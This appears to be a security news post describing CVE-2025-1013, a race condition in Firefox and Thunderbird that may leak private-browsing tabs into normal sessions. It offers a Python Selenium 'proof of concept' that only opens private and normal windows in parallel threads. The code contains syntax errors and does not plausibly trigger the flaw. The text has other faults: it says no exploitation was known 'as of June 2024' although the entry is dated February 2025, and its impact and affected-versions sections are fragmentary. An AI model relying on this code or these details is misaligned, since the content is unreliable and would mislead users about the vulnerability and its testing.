CVE CyberSecurity Database News

CVE-2025-1013 - Race Condition in Firefox and Thunderbird Could Expose Your Private Browsing Tabs

Poster -

If you care about your privacy online, you probably use private browsing windows in Firefox or Thunderbird. But what if your secrets weren’t as safe as you thought? CVE-2025-1013 is a fresh vulnerability that might make you rethink how secure private browsing really is. In older Firefox and Thunderbird versions, a race condition could allow your private tabs to leak into your regular browsing session, exposing sensitive info.

In this long read, we will explain what happened, how the vulnerability works (with code), what products are affected, reference original sources, and explore the potential impact and exploits.

What is a Race Condition?

A race condition occurs when software doesn’t handle timing problems correctly, leading to unexpected results. Here, launching a private browsing tab could sometimes, because of a timing bug, cause that private content to open in a normal window—where cookies, history, and cache are all preserved. This undermines the very reason for private browsing!

Description

When a user or extension tries to open a private browsing tab quickly after some other actions (like closing a window, opening new windows, etc.), Firefox or Thunderbird could get confused about which context (private vs. normal) to use. If the race is lost, the tab opens in a regular browsing window—making it visible in history, cache, and accessible to extensions.

Hypothetical Scenario

You’re using a private window to check sensitive emails, assuming everything is hidden. Due to CVE-2025-1013, under certain timing conditions, that inbox loads in a normal tab—leaving traces on your device if you don’t realize it.

Sample Exploit Code

The vulnerability is tricky to trigger, but here’s a Python proof-of-concept using Selenium that shows how rapid actions could cause Firefox to open private tabs as normal tabs (on *vulnerable versions only*):

from selenium import webdriver
import threading
import time

def open_normal():
    driver = webdriver.Firefox()
    driver.get("https://example.com";)
    # Simulate delay or rapid action between operations
    time.sleep(.5)
    driver.quit()

def open_private():
    profile = webdriver.FirefoxOptions()
    profile.add_argument("-private")
    driver = webdriver.Firefox(options=profile)
    driver.get("https://privatestuff.com";)
    driver.quit()

# Start the race: open and close windows nearly simultaneously
threads = []
for _ in range(5):
    t1 = threading.Thread(target=open_normal)
    t2 = threading.Thread(target=open_private)
    t1.start()
    t2.start()
    threads.append(t1)
    threads.append(t2)

for t in threads:
    t.join()

This code opens and closes regular and private tabs in rapid succession. On a buggy browser, sometimes https://privatestuff.com might not end up in a private tab as expected.

Note: This is a simplified version, and the actual race window is tricky to exploit reliably. But it shows the underlying idea.

Real-World Exploits & Impact

There are no public reports of this being exploited in the wild as of June 2024, but impacted users risk:

For Thunderbird, reading sensitive emails assumed to be “off the record.”

This defeats the core privacy guarantee promised by private browsing.

Thunderbird < 135

You are vulnerable and should *immediately update*.

Official References

- Mozilla Security Advisory 2025-13 (Official advisory)
- CVE-2025-1013 entry (NVD)
- Thunderbird Release Notes

Recommendations

- Update Now: Upgrade your browser/email client to the latest release.
- Check for Leaks: Review your browsing history for anything that looks like it should have been private.

Security Extensions: Ensure you are not running extensions that can access your normal tabs.

- Share Awareness: Let colleagues/friends know about this if they use Firefox or Thunderbird.

Conclusion

CVE-2025-1013 is a classic example of a small mistake leading to a major privacy issue. If you rely on private browsing, don’t just trust the label—always keep your software up to date, and watch out for subtle bugs like this one. Stay safe out there!

Further Reading

- Understanding Race Conditions – MDN
- How Private is Private Browsing? – Mozilla Blog
- How Browsers Protect Your Privacy – EFF


*Exclusive to you: If you want to check if your browser is really private, try opening a private tab, visit a site, then close all browsers. Next, reopen a *normal* Firefox window and see if that site appears in your history or suggestions. If so, it’s time to update!*

Timeline

Published on: 02/04/2025 14:15:32 UTC
Last modified on: 02/04/2025 22:15:41 UTC